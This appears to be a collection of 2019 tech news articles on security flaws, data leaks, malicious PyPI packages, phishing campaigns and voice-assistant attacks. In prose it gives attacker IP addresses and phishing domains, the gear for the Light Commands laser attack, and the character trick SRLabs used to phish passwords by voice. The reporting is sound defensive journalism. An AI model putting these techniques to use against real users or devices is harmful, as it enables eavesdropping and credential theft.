Tech News - Cybersecurity

On Wednesday, security researchers from the University of New Mexico disclosed a vulnerability impacting most Linux distributions and Unix-like operating systems including FreeBSD, OpenBSD, macOS, iOS, and Android. This Linux vulnerability can be exploited by an attacker to determine if a user is connected to a VPN and to hijack VPN connections. The researchers shared that this security flaw tracked as CVE-2019-14899, “allows a network adjacent attacker to determine if another user is connected to a VPN, the virtual IP address they have been assigned by the VPN server, and whether or not there is an active connection to a given website." Additionally, attackers can determine the exact sequence and acknowledgment numbers by counting encrypted packets or by examining their size. With this information in hand, they can inject arbitrary data payloads into IPv4 and IPv6 TCP streams. What systems are affected by this Linux vulnerability While testing for this vulnerability, the researchers found that it did not affect any Linux distribution prior to Ubuntu 19.10. They further noted that all distributions that use 'systemd' versions released after November 28, 2018, that have their rp_filter (reverse path filtering) set to “loose” by default are vulnerable. Here’s a non-exhaustive list of systems that the researchers found vulnerable: Ubuntu 19.10 (systemd) Fedora (systemd) Debian 10.2 (systemd) Arch 2019.05 (systemd) Manjaro 18.1.1 (systemd) Devuan (sysV init) MX Linux 19 (Mepis+antiX) Void Linux (runit) Slackware 14.2 (rc.d) Deepin (rc.d) FreeBSD (rc.d) OpenBSD (rc.d) Attacks exploiting this Linux vulnerability works against OpenVPN, WireGuard, and IKEv2/IPSec. However, the team noted they were able to make all the inferences even when the responses from the victim were encrypted. Regardless of what VPN technology you are using, the size and number of packets sent were enough to find the kind of packets are being sent through the encrypted VPN tunnel. In response to the public disclosure, Jason A. Donenfeld, the creator of the WireGuard, clarified that "this isn't a WireGuard vulnerability, but rather something in the routing table code and/or TCP code on affected operating systems." He added, “However, it does affect us, since WireGuard exists on those affected OSes.” A network security consultant Noel Kuntze also said in a reply to the disclosure report that only route-based VPN implementations are impacted by this Linux vulnerability. The researchers have also shared a few mitigation strategies including turning reverse path filtering on, using bogon filtering, and encrypting packet size and timing. You can check out the full disclosure report of this Linux vulnerability for further details. StackRox Kubernetes Security Platform 3.0 releases with advanced configuration and vulnerability management capabilities An unpatched vulnerability in NSA’s Ghidra allows a remote attacker to compromise exposed systems 10 times ethical hackers spotted a software vulnerability and averted a crisis

Yesterday, ZDNet reported that the Python security team removed two fake Python libraries from PyPI (Python Package Index). These libraries were caught stealing SSH and GPG keys from the Python projects. As per ZDNet, the two malicious clones were discovered by a German software developer Lukas Martini on 1st Dec. Both libraries were removed on the same day after Martini notified the developers and the PyPI security team. The two libraries were created by the same developer and mimicked as other more popular libraries -- using a technique called typosquatting, to register similar-looking names. The first is "python3-dateutil," which imitated the popular "dateutil" library. The second is "jeIlyfish" (here the first L is an I), which mimicked the "jellyfish" library. One of them was uploaded on Pypi two days before while the other one was live for more than a year. Purpose of stealing SSH and GPG keys According to Martini, the malicious code was present only in the jeIlyfish library. The python3-dateutil package didn't contain malicious code of its own, but it did import the jeIlyfish library, meaning it was malicious by association. The malicious code read a list of hashes stored in a GitLab repository. The nature and purpose of these hashes is unknown, as neither Martini or the PyPI team detailed the behavior of stealing the keys before the library was removed. ZDNet spoke to Paul Ganssle from the dateutil dev team, "The code directly in the `jeIlyfish` library downloads a file called 'hashsum' that looks like nonsense from a gitlab repo, then decodes that into a Python file and executes it," Ganssle states. "It looks like [this file] tries to exfiltrate SSH and GPG keys from a user's computer and sends them to this IP address: http://68.183.212.246:32258. It also lists a bunch of directories, home directory, PyCharm Projects directory," Ganssle added. "If I had to guess what the purpose of that is, I would say it's to figure out what projects the credentials work for so that the attacker can compromise that person's projects." Python developers advised to review projects Excluding the malicious code, both typosquatted packages were identical copies of the original libraries, meaning they would have worked as the originals. Developers who didn't pay attention to the libraries they downloaded or imported into their projects are advised to check if they've used the correct package names and did not accidentally use the typosquatted versions. If they accidentally used any of the two, developers must change all SSH and GPG keys which they've used over the past year. This is the third time the PyPI team intervenes to remove typo-squatted malicious Python libraries from the official repository. Similar incidents took place recently in July 2019 and another in October 2018 and September 2017. On this news, developers on Hacker News discuss about this as an OS issue. One of the user comments, “I don't know what the solution is but it feels like this is a much bigger issue and we need some rethinking of how OSes work by default. Apple has taken some steps it seems the last 2 MacOS updates where they block access to certain folders for lots of executables until the user specifically gives that permission. Unfortunately for things like python the permission is granted to the Terminal app so once given, all programs running under the terminal inherit the permissions. Microsoft has started adding short life VMs. No idea if that's good. Both MS and Apple offer their App stores with more locked down experiences though I'm sad they conflate app security and app markets. Basically anytime I run any software, everytime I run "make" or "npm install" or "pip install" or download a game on Steam etc I'm having to trust 1000s of strangers they aren't downloading my keys, my photos, my docs, etc...I think you should be in control of your machine but IMO it's time to default to locked down instead of defaulting to open.” Introducing Spleeter, a Tensorflow based python library that extracts voice and sound from any music track SatPy 0.10.0, python library for manipulating meteorological remote sensing data, released Meet Pypeline, a simple python library for building concurrent data pipelines

Last month, two security researchers, Noam Rotem and Ran Locar found an unprotected database managed by TrueDialog. The database exposed tens of millions of SMS text messages exchanged between businesses and their customers. TrueDialog is a US-based SMS text service provider for enterprise businesses and higher education. Its cloud-based texting platform enables users to send both one-to-one as well as bulk messages to customers. What data TrueDialog’s database exposed Along with millions of sent and received text messages, this database included phone numbers, marketing messages from businesses with discount codes, job alerts, and more. Some of the two-way messages had a unique conversation code using which anyone would be able to read the entire thread of conversations. What concerning is that there were also text messages with sensitive information. As per TechCrunch, the database included “two-factor codes and other security messages, which may have allowed anyone viewing the data to gain access to a person’s online accounts.” TechCrunch further shared that the database also included messages containing codes to access online medical services, password reset and login codes for sites including Facebook and Google, and usernames and passwords of TrueDialog’s customers. TrueDialog took the database offline shortly after being contacted by TechCrunch. However, the company’s chief executive John Wright did not acknowledge the breach or gave any clarity on whether TrueDialog will be informing this to its customers. This is another case of companies being negligent towards their customers’ data. In October this year, an Elasticsearch server, allegedly belonging to two data enrichment companies exposed the personal information of nearly 1.2 billion users. In another case, security researcher Oliver Hough discovered that printing company Vistaprint left an online database containing customer interactions unencrypted. Check out the report by Noam Rotem and Ran Locar to know more about TrueDialog data leak in detail. GDPR complaint in EU claim billions of personal data leaked via online advertising bids How to protect your VPN from Data Leaks DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants  

Last month, Vinny Troia, the founder of Data Viper and Bob Diachenko, an independent cybersecurity consultant discovered a “wide-open” Elasticsearch server. The server exposed the personal information of about 1.2 billion unique users including their names, email addresses, phone numbers, LinkedIn and Facebook profile information. The Elasticsearch server did not have any kind of authentication whatsoever and was accessible via a web browser. "No password or authentication of any kind was needed to access or download all of the data," the report adds. What the investigation on the Elasticsearch server revealed Troia and Diachenko came across the Elasticsearch server while looking for exposures on the web scanning services BinaryEdge and Shodan. Upon further investigation, the researchers speculated that the data originated from two different data enrichment companies: People Data Labs and  OxyData.io. Data enrichment, as the name suggests, is a process of enhancing the existing raw data to make it useful for businesses. Data enrichment companies can provide access to large stores of data merged from multiple third-party sources, which enables businesses to gain deeper insights into their current and potential customers. Elasticsearch stores its data in an index, which is similar to a ‘database’ in a relational database. The researchers found that the majority of the data spanned four separate data indexes, labeled “PDL” and “OXY”. Also, each user record was labeled with a “source” field that matched either PDL or Oxy, respectively. After the researchers de-duplicated the nearly 3 billion user records with the PDL index, they found roughly 1.2 billion unique people and 650 million unique email addresses. These numbers matched with the statistics provided by the company on their website. The data within the three PDL indexes included slightly varied information. While some focused on scraped LinkedIn information, email addresses and phone numbers, others included information on individual social media profiles such as a person’s Facebook, Twitter, and Github URLs. After analyzing the data under the OXY index, the researchers found scrape of LinkedIn data, including recruiter information. What made the case confusing was that the Elasticsearch server was hosted on Google Cloud Services, while People Data Labs appears to be using Amazon Web Services. When contacted about the Elasticsearch server, both the companies denied that the server belonged to them. In an interview with Wired, PDL co-founder Sean Thorne said, “The owner of this server likely used one of our enrichment products, along with a number of other data-enrichment or licensing services. Once a customer receives data from us, or any other data providers, the data is on their servers and the security is their responsibility. We perform free security audits, consultations, and workshops with the majority of our customers." This news sparked a discussion on Hacker News. While some users were stunned by the sheer negligence of leaving the Elasticsearch server wide-open, others were questioning the core business model of these companies. A user commented, “It has to exist on a private network behind a firewall with ports open to application servers and other es nodes only. Running things on a public IP address is a choice that should not be taken lightly. Clustering over the public internet is not a thing with Elasticsearch (or similar products).” “It's a tragedy that all of this data was available to anyone in a public database instead of.... checks notes... available to anyone who was willing to sign up for a free account that allowed them 1,000 queries. It seems like PDL's core business model is irresponsible regarding their stewardship of the data they've harvested,” another user added. Read the full report on Data Viper’s official website. Adobe confirms security vulnerability in one of their Elasticsearch servers that exposed 7.5 million Creative Cloud accounts Following Capital One data breach, GitHub gets sued and AWS security questioned by a U.S. Senator US Customs and Border Protection reveal data breach that exposed thousands of traveler photos and license plate images

Yesterday, Maddie Stone, a Security Researcher in the Google Project Zero team shared a detailed analysis of the use-after-free Android Binder vulnerability. The vulnerability, tracked under CVE-2019-2215 was being exploited in-the-wild affecting most Android devices manufactured before fall last year. Stone's post goes into detail about how they discovered this Android Binder vulnerability, its technical details, how it can be exploited, and its fix. Along with these details, she also shared that the Project Zero team is working on improving their approach of handling "in-the-wild" zero-day exploits under the mission "make zero-day hard." Their current approach is to hunt for bugs based on rumors or leads and patch the bug, perform variant analysis to find similar vulnerabilities and patch them. Finally, sharing the complete detailed analysis of the exploit with the community. The use-after-free Android Binder vulnerability The use-after-free Android Binder vulnerability is a local privilege escalation vulnerability that gives the attacker full read and write access to a vulnerable device. It is not new though. Back in 2017, Szybot, a syzkaller system reported it to both the Linux kernel and syzkaller-bugs mailing lists. In February 2018, it was patched in the Linux 4.14, Android 3.18, Android 4.4, and Android 4.9 kernels. The patch, however, never made it to the Android monthly security bulletin leaving many already released devices such as Pixel and Pixel 2 vulnerable to an exploit. Then in late summer 2019, the NSO Group, an Israel-based technology firm known for its Pegasus spyware, informed Project Zero about an Android zero-day exploit that was part of an attack chain that installed Pegasus spyware on target devices. Based on the details shared by the NSO Group Stone was able to track down the bug in Android Binder. Project Zero reported the Android Binder vulnerability to Android on September 27. In the report Stone has shared a list of devices that appear to be vulnerable: “Other devices which appear to be vulnerable based on source code review are (referring to 8.x releases unless otherwise stated): 1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/) 2) Huawei P20 3) Xiaomi Redmi 5A 4) Xiaomi Redmi Note 5 5) Xiaomi A1 6) Oppo A3 7) Moto Z3 8) Oreo LG phones (run the same kernel according to the website) 9) Samsung S7, S8, S9 “ After reporting the Android Binder vulnerability to Android, the team publicly disclosed it on October 3 and three days later Android added updates to the October Android Security Bulletin. In a statement to the Project Zero team, Android shared, "Android partners were notified of the bug and provided updates to address it within 24 hours. Android also assigned CVE-2019-2215 to explicitly indicate that it represents a security vulnerability as the original report from syzkaller and the corresponding Linux 4.14 patch did not highlight any security implications.” The statement further reads, “Pixel 3 and 3a were already protected against these issues. Updates for affected Pixel devices were available to users as early as October 7th, 2019.” To read more about the exploit, check out Stone’s blog post: Bad Binder: Android In-The-Wild Exploit. Also, check out the proof-of-concept exploit that Stone wrote together with Jann Horn, a fellow team member. The PoC demonstrates how this vulnerability can be used to gain arbitrary read and write permissions when run locally. StackRox Kubernetes Security Platform 3.0 releases with advanced configuration and vulnerability management capabilities An unpatched vulnerability in NSA’s Ghidra allows a remote attacker to compromise exposed systems 10 times ethical hackers spotted a software vulnerability and averted a crisis  

On Tuesday, SaltStack, the creators of intelligent automation for IT operations and security teams, announced the general availability of SaltStack Protect. SaltStack Protect is for automated discovery and remediation of security vulnerabilities across web-scale infrastructure. It is a new product available in the SaltStack SecOps family of products and is an addition to SaltStack Comply. SaltStack Comply automates the work of continuous compliance and has been updated with new CIS Benchmark content and a new SDK for the creation of custom security checks. The SaltStack SecOps products provides a collaborative platform for both security and IT operations teams to help customers break down organizational silos, offset security and IT skills gaps and talent shortages. “The massive amount of coordination and work required to actually fix thousands of infrastructure security vulnerabilities as quickly as possible is daunting. Vulnerability assessment and management tools require integrated and automated remediation to close the loop on IT security. SaltStack Protect gives security operations teams the power to control, optimize, and secure the entirety of their IT infrastructure while helping teams collaborate to mitigate risk.” said Marc Chenn, SaltStack CEO. Key features in SaltStack Protect As per the team, SaltStack Protect automates the remediation of vulnerabilities by delivering closed-loop workflows to scan, detect, prioritize, and fix critical security threats. Other capabilities include: Native CVE scanning – SaltStack Protect scans for both on-premise and cloud systems to detect threats based on more than 12,000 CVEs across operating systems and infrastructure. Intelligent vulnerability prioritization – To assess and prioritize threats for remediation, SaltStack collects real-time data on the configuration state of every asset in an environment and combines it with vulnerability information from SaltStack Protect to accurately differentiate vulnerabilities that are exploitable from those that are not. Automated remediation – SaltStack Protect brings the power of automation to SecOps teams with an API-first solution that scans IT systems for vulnerabilities and then provides out-of-the-box automation workflows to remediate them. As per the company, SaltStack SecOps products are built on SaltStack enterprise delivering a single platform for frictionless collaboration between security and IT teams. This resulted in users having a 95% decrease in the time required to find and fix critical vulnerabilities. While traditional security scanning tools report vulnerabilities that operations teams must investigate, prioritize, test, fix, and then report back to security. SaltStack eliminates nearly all the manual steps associated with vulnerability remediation, potentially saving time, resources, and redundant tools to protect against critical vulnerabilities. SaltStack is used by many IT operations, DevOps and site reliability engineering organizations around the world such as IBM Cloud, eBay, and TD Bank. If you are interested to know more about this news, check out their official blog post. Additionally SaltStack Comply and SaltStack Protect are also available via subscription and you can schedule a trial demo too. DevSecOps and the shift left in security: how Semmle is supporting software developers [Podcast] Why do IT teams need to transition from DevOps to DevSecOps? 5 reasons poor communication can sink DevSecOps 2019 Deloitte tech trends predictions: AI-fueled firms, NoOps, DevSecOps, intelligent interfaces, and more Can DevOps promote empathy in software engineering?

On Tuesday, at the ongoing Microsoft Ignite, Yubico, the leading provider of authentication and encryption hardware, announced the long-awaited YubiKey Bio. YubiKey Bio is the first YubiKey to support fingerprint recognition for secure and seamless passwordless logins. As per the team this feature has been a top requested feature from many of their YubiKey users. Key features in YubiKey Bio The YubiKey Bio delivers the convenience of biometric login with the added benefits of Yubico’s hallmark security, reliability and durability assurances. Biometric fingerprint credentials are stored in the secure element that helps protect them against physical attacks. As a result, a single, trusted hardware-backed root of trust delivers a seamless login experience across different devices, operating systems, and applications. With support for both biometric- and PIN-based login, the YubiKey Bio leverages the full range of multi-factor authentication (MFA) capabilities outlined in the FIDO2 and WebAuthn standard specifications. In keeping with Yubico’s design philosophy, the YubiKey Bio will not require any batteries, drivers, or associated software. The key seamlessly integrates with the native biometric enrollment and management features supported in the latest versions of Windows 10 and Azure Active Directory, making it quick and convenient for users to adopt a phishing-resistant passwordless login flow. “As a result of close collaboration between our engineering teams, Yubico is bringing strong hardware-backed biometric authentication to market to provide a seamless experience for our customers,” said Joy Chik, Corporate VP of Identity, Microsoft. “This new innovation will help drive adoption of safer passwordless sign-in so everyone can be more secure and productive.” The Yubico team has worked with Microsoft in the past few years to help drive the future of passwordless authentication through the creation of the FIDO2 and WebAuthn open authentication standards. Additionally they have built YubiKey integrations with the full suite of Microsoft products including Windows 10 with Azure Active Directory and Microsoft Edge with Microsoft Accounts. Microsoft Ignite attendees saw a live demo of passwordless sign-in to Microsoft Azure Active Directory accounts using the YubiKey Bio. The team also promises that by early next year, enterprise users will be able to authenticate to on-premises Active Directory integrated applications and resources. And provide seamless Single Sign-On (SSO) to cloud- and SAML-based applications. To take advantage of strong YubiKey authentication in Azure Active Directory environments, users can refer to this page for more information. On Hacker News, this news has received mixed reactions while some are in favour of the biometric authentication, others believe that keeping stronger passwords is still a better choice. One of them commented, “1) This is an upgrade to the touch sensitive button that's on all YubiKeys today. The reason you have to touch the key is so that if an attacker gains access to your computer with an attached Yubikey, they will not be able to use it (it requires physical presence). Now that touch sensitive button becomes a fingerprint reader, so it can't be activated by just anyone. 2) The computer/OS doesn't have to support anything for this added feature.” Another user responds, “A fingerprint is only going to stop a very opportunistic attacker. Someone who already has your desktop and app password and physical access to your desktop can probably get a fingerprint off a glass, cup or something else. I don't think this product is as useful as it seems at first glance. Using stronger passwords is probably just as safe.” Google updates biometric authentication for Android P, introduces BiometricPrompt API GitHub now supports two-factor authentication with security keys using the WebAuthn API You can now use fingerprint or screen lock instead of passwords when visiting certain Google services thanks to FIDO2 based authentication Microsoft and Cisco propose ideas for a Biometric privacy law after the state of Illinois passed one SafeMessage: An AI-based biometric authentication solution for messaging platforms

Researchers from the University of Electro-Communications in Tokyo and the University of Michigan released a paper on Monday, that gives alarming cues about the security of voice-control devices. In the research paper the researchers presented ways in which they were able to manipulate Siri, Alexa, and other devices using “Light Commands”, a vulnerability in in MEMS (microelectro-mechanical systems) microphones. Light Commands was discovered this year in May. It allows attackers to remotely inject inaudible and invisible commands into voice assistants, such as Google assistant, Amazon Alexa, Facebook Portal, and Apple Siri using light. This vulnerability can become more dangerous as voice-control devices gain more popularity. How Light Commands work Consumers use voice-control devices for many applications, for example to unlock doors, make online purchases, and more with simple voice commands. The research team tested a handful of such devices, and found that Light Commands can work on any smart speaker or phone that uses MEMS. These systems contain tiny components that convert audio signals into electrical signals. By shining a laser through the window at microphones inside smart speakers, tablets, or phones, a far away attacker can remotely send inaudible and potentially invisible commands which are then acted upon by Alexa, Portal, Google assistant or Siri. Many users do not enable voice authentication or passwords to protect devices from unauthorized use. Hence, an attacker can use light-injected voice commands to unlock the victim's smart-lock protected home doors, or even locate, unlock and start various vehicles. Further researchers also mentioned that Light Commands can be executed at long distances as well. To prove this they demonstrated the attack in a 110 meter hallway, the longest hallway available in the research phase. Below is the reference image where team demonstrates the attack, additionally they have captured few videos of the demonstration as well. Source: Light Commands research paper. Experimental setup for exploring attack range at the 110 m long corridor The Light Commands attack can be executed using a simple laser pointer, a laser driver, and a sound amplifier. A telephoto lens can be used to focus the laser for long range attacks. Detecting the Light Commands attacks Researchers also wrote how one can detect if the devices are attacked by Light Commands. They believe that command injection via light makes no sound, an attentive user can notice the attacker's light beam reflected on the target device. Alternatively, one can attempt to monitor the device's verbal response and light pattern changes, both of which serve as command confirmation. Additionally they also mention that so far they have not seen any such cases where the Light Command attack has been maliciously exploited. Limitations in executing the attack Light Commands do have some limitations in execution: Lasers must point directly at a specific component within the microphone to transmit audio information. Attackers need a direct line of sight and a clear pathway for lasers to travel. Most light signals are visible to the naked eye and would expose attackers. Also, voice-control devices respond out loud when activated, which could alert nearby people of foul play. Controlling advanced lasers with precision requires a certain degree of experience and equipment. There is a high barrier to entry when it comes to long-range attacks. How to mitigate such attacks Researchers in the paper suggested to add an additional layer of authentication in voice assistants to mitigate the attack. They also suggest that manufacturers can attempt to use sensor fusion techniques, such as acquiring audio from multiple microphones. When the attacker uses a single laser, only a single microphone receives a signal while the others receive nothing. Thus, manufacturers can attempt to detect such anomalies, ignoring the injected commands. Another approach proposed is reducing the amount of light reaching the microphone's diaphragm. This can be possible by using a barrier that physically blocks straight light beams to eliminate the line of sight to the diaphragm, or by implementing a non-transparent cover on top of the microphone hole to reduce the amount of light hitting the microphone. However, researchers also agreed that such physical barriers are only effective to a certain point, as an attacker can always increase the laser power in an attempt to pass through the barriers and create a new light path. Users discuss photoacoustic effect at play On Hacker News, this research has gained much attention as users find this interesting and applaud researchers for the demonstration. Some discuss the laser pointers and laser drivers price and features available to hack the voice assistants. Others discuss how such techniques come to play, one of them says, “I think the photoacoustic effect is at play here. Discovered by Alexander Graham Bell has a variety of applications. It can be used to detect trace gases in gas mixtures at the parts-per-trillion level among other things. An optical beam chopped at an audio frequency goes through a gas cell. If it is absorbed, there's a pressure wave at the chopping frequency proportional to the absorption. If not, there isn't. Synchronous detection (e.g. lock in amplifiers) knock out any signal not at the chopping frequency. You can see even tiny signals when there is no background. Hearing aid microphones make excellent and inexpensive detectors so I think that the mics in modern phones would be comparable. Contrast this with standard methods where one passes a light beam through a cell into a detector, looking for a small change in a large signal. https://chem.libretexts.org/Bookshelves/Physical_and_Theoret... Hats off to the Michigan team for this very clever (and unnerving) demonstration.” Smart Spies attack: Alexa and Google Assistant can eavesdrop or vish (voice phish) unsuspecting users, disclose researchers from SRLabs How Chaos Engineering can help predict and prevent cyber-attacks preemptively An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack Intel’s DDIO and RDMA enabled microprocessors vulnerable to new NetCAT attack Wikipedia hit by massive DDoS (Distributed Denial of Service) attack; goes offline in many countries

Last week, Google notified its users that the ‘stable channel’ desktop Chrome browser is being updated to version 78.0.3904.87 for Windows, Mac, and Linux and will be rolled out in the coming weeks. This comes after some external researchers found two high severity vulnerabilities in the Chrome web browser. The first zero-day vulnerability, assigned CVE-2019-13720, was found by two malware researchers Anton Ivanov and Alexey Kulaev from Kaspersky, a private internet security solutions company. This vulnerability is present in Chrome’s PDFium library. Google has confirmed that this vulnerability still “exists in the wild.” The other vulnerability CVE-2019-13721 was found by banananapenguin and affects Chrome's audio component. No exploitation of this vulnerability has been reported so far. Google has not revealed the technical details of both vulnerabilities. “Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.” Both vulnerabilities are use-after-free vulnerabilities, which means that they have a type of memory flaw that can be leveraged by hackers to execute arbitrary code.  The Kaspersky researchers have named the CVE-2019-13720 vulnerability as Operation WizardOpium, as they have not been able to establish a definitive link of this vulnerability with any known threat actors.  According to Kaspersky, this vulnerability leverages a waterhole-style injection on a Korean-language news portal. This enabled a malicious JavaScript code to be inserted on the main page, which in turn, loads a profiling script from a remote site. The main index page then hosts a small JavaScript tag that loads the remote script. This JavaScript tag checks if the victim’s system can be infected by performing a comparison with the browser’s user agent.  The Kaspersky researchers say, “The exploit used a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker a Use-After-Free (UaF) condition that is very dangerous because it can lead to code execution scenarios, which is exactly what happens in our case.” The attacker can use this vulnerability to perform numerous operations to allocate/free memory along with other techniques that eventually give the attackers an arbitrary read/write primitive. This technique is used by attackers to create a “special object that can be used with WebAssembly and FileReader together to perform code execution for the embedded shellcode payload.” You can read Kaspersky detailed report for more information on the zero-day vulnerability. Adobe confirms security vulnerability in one of their Elasticsearch servers that exposed 7.5 million Creative Cloud accounts Mobile-aware phishing campaign targets UNICEF, the UN, and many other humanitarian organizations NordVPN reveals it was affected by a data breach in 2018

Last week, Adobe admitted of being the victim of a serious security incident exposing the personal information of nearly 7.5 million users. The information belonged to the company’s popular Creative Cloud service. Adobe Creative Cloud service has approximately 15 million subscribers, providing them access to a suite of popular Adobe products such as Photoshop, Lightroom, Illustrator, InDesign, Premiere Pro, Audition, After Effects, and many others. The news was initially reported by security firm Comparitech. Comparitech partnered with security researcher Bob Diachenko to uncover the exposed database. They discovered that Adobe left an Elasticsearch server unsecured accessible on the web without any password or authentication required. The leak was plugged by Adobe after being alerted. The official statement from Adobe reads, “Late last week, Adobe became aware of a vulnerability related to work on one of our prototype environments. We promptly shut down the misconfigured environment, addressing the vulnerability”. The exposed database included details like: Email addresses Account creation date Which Adobe products they use Subscription status Whether the user is an Adobe employee Member IDs Country Time since last login Payment status Adobe also admitted that the data did not include passwords, payment or financial information. Although there were no such sensitive information in the database, the consequence of such exposure can be increased possibility of targeted phishing email and scams. “Fraudsters could pose as Adobe or a related company and trick users into giving up further info, such as passwords, for example,” Comparitech said. It’s therefore crucial that users turn on two-factor authentication to add a second layer of account protection. Adobe is no stranger to data privacy problems; in October 2013, company suffered a similar kind of data breach that impacted 38 million users. Additionally, 3 million encrypted customer credit cards and login credentials for an unknown number of users were exposed. The incident is not the only time instances of data breach headlines. In recent months, Ecuadorian, NordVPN, a popular Virtual Private Network and StockX, an online marketplace for buying and selling sneakers have had their users personal information left unprotected and exposed on the web. This clearly shows that tech companies still have a long way to go in order to achieve end to end secure networks and servers. Following Capital One data breach, GitHub gets sued and AWS security questioned by a U.S. Senator British Airways set to face a record-breaking fine of £183m by the ICO over customer data breach US Customs and Border Protection reveal data breach that exposed thousands of traveler photos and license plate images

A few days ago researchers from the Lookout Phishing AI reported a mobile-aware phishing campaign that targets non-governmental organizations around the world including UNICEF, a variety of United Nations humanitarian organizations, the Red Cross and UN World Food, etc. The company has also contacted law enforcement and the targeted organizations. “The campaign is using landing pages signed by SSL certificates, to create legitimate-looking Microsoft Office 365 login pages,” Threatpost reports. According to the Lookout Phishing AI researchers, “The infrastructure connected to this attack has been live since March 2019. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign: 111.90.142.105 and 111.90.142.91. The associated IP network block and ASN (Autonomous System Number) is understood by Lookout to be of low reputation and is known to have hosted malware in the past.” The researchers have also detected very interesting techniques used in this campaign. It quickly detects mobile devices and logs keystrokes directly as they are entered in the password field. Simultaneously, the JavaScript code logic on the phishing pages delivers device-specific content based on the device the victim uses. “Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception,” Jeremy Richards, Principal Security Researcher, Lookout Phishing AI wrote in his blog post. Further, the SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. The Lookout researchers said that currently, six certificates are still valid. They also suspect that these attacks may still be ongoing. Alexander García-Tobar, CEO and co-founder of Valimail, told Threatpost via email, “By using deviously coded phishing sites, hackers are attempting to steal login credentials and ultimately seek monetary gain or insider information.” To know more about this news in detail, read Lookout’s official blog post. UK’s NCSC report reveals significant ransomware, phishing, and supply chain threats to businesses A new Stuxnet-level vulnerability named Simjacker used to secretly spy over mobile phones in multiple countries for over 2 years: Adaptive Mobile Security reports Smart Spies attack: Alexa and Google Assistant can eavesdrop or vish (voice phish) unsuspecting users, disclose researchers from SRLabs

NordVPN, a popular Virtual Private Network revealed that it was subject to a data breach in 2018. The breach came to light a few months ago when an expired internal security key was exposed, allowing anyone outside the company unauthorized access. NordVPN did not inform users then as they wanted to be "100 percent sure that each component within our infrastructure is secure." Details of the breach were traced back to March 2018 when one of NordVPN’s data centers in Finland, from whom they rent their servers from showed signs of unauthorized access. The attacker gained access to the server by exploiting an unsecured remote management system by the provider. In a press release statement, NordVPN explained "only 1 of more than 3000 servers we had at the time was affected." and that the company immediately terminated its contract with the data center provider after it learned of the hack. Even though the company had intrusion detection systems installed to find data breaches, it could not predict a remote data management system left by the data center provider. On the other hand, NordVPN said it was unaware that such a system existed. The company also said, "We are taking all the necessary means to enhance our security. We have undergone an application security audit, are working on a second no-logs audit right now, and are preparing a bug bounty program." They further added, "We will give our all to maximize the security of every aspect of our service, and next year we will launch an independent external audit ... of our infrastructure to make sure we did not miss anything else." NordVPN said that the attacker did not gain access to activity logs, user-credentials, or any other sensitive information. NordVPN maintains what it says is a strict "zero logs" policy. "We don’t track, collect, or share your private data," the company says on its website. In a statement to TechCrunch, NordVPN spokesperson Laura Tyrell said, “The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either.” She further added, “On the same note, the only possible way to abuse the website traffic was by performing a personalized and complicated man-in-the-middle attack to intercept a single connection that tried to access NordVPN.” Based on a few records posted online, other VPN providers such as TorGuard and VikingVPN may have also been compromised. A spokesperson for TorGuard told TechCrunch that a “single server” was compromised in 2017 but denied that any VPN traffic was accessed. Users are furious that NordVPN did not inform them on time. https://twitter.com/figalmighty/status/1186566775330066432 https://twitter.com/bleepsec/status/1186557192549404672 To know more about this news in detail, you can read NordVPN’s complete press release. DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants StockX confirms a data breach impacting 6.8 million customers Following Capital One data breach, GitHub gets sued and AWS security questioned by a U.S. Senator

In a new study security researchers from SRLabs have exposed a serious vulnerability - Smart Spies attack in smart speakers from Amazon and Google. According to SRLabs, smart speaker voice apps - Skills for Alexa and Actions on Google Home can be abused to eavesdrop on users or vish (voice-phish) their passwords. The researchers demonstrated that with Smart Spies attack they can get these smart speakers to silently record users or ask their Google account passwords by simply uploading a malicious software disguised as Alexa skill or Google action. The SRLabs team added "�. " (U+D801, dot, space) character sequence to various locations inside the backend of a normal Alexa/Google Home app. They tell a user that an app has failed, insert the "�. " to induce a long pause, and then prompt the user with the phishing message after a few minutes. This tricks users into believing the phishing message has nothing to do with the previous app with which they interacted. Using this sequence, the voice assistants kept on listening for much longer than usual for further commands. Anything the user says is then automatically transcribed and can be sent directly to the hacker. This revelation of Smart Spies attack is unsurprising considering Alexa and Google Home were found phishing and eavesdropping before. In June of this year, two lawsuits were filed in Seattle that allege that Amazon is recording voiceprints of children using its Alexa devices without their consent. Later, Amazon employees were found listening to Echo audio recordings, followed by Google’s language experts doing the same. SRLabs researchers urge users to be more aware of Smart Spies attack and the potential of malicious voice apps that abuse their smart speakers. They caution users to be more aware of third-party app sources while installing a new voice app on their speakers. Measures suggested to Google and Amazon to avoid Smart Spies attack Amazon and Google need to implement better protection, starting with a more thorough review process of third-party Skills and Actions made available in their voice app stores. The voice app review needs to check explicitly for copies of built-in intents. Unpronounceable characters like “�. “ and silent SSML messages should be removed to prevent arbitrary long pauses in the speakers’ output. Suspicious output texts including “password“ deserve particular attention or should be disallowed completely. In a statement provided to Ars Technica, Amazon said it has put new mitigations in place to prevent and detect skills from being able to do this kind of thing in the future. It said that it takes down skills whenever this kind of behavior is identified. Google also told Ars Technica that it has review processes to detect this kind of behavior, and has removed the actions created by the security researchers. The company is conducting an internal review of all third-party actions, and has temporarily disabled some actions while this is taking place. On Twitter people condemned Google and Amazon and cautioned others not to buy their smart speakers. https://twitter.com/ClaudeRdCardiff/status/1186577801459187712 https://twitter.com/Jake_Hanrahan/status/1186082128095825920 For more information, read the blog post on Smart Spies attack by SRLabs. Google’s language experts are listening to some recordings from its AI assistant Amazon’s partnership with NHS to make Alexa offer medical advice raises privacy concerns and public backlash Amazon is being sued for recording children’s voices through Alexa without consent

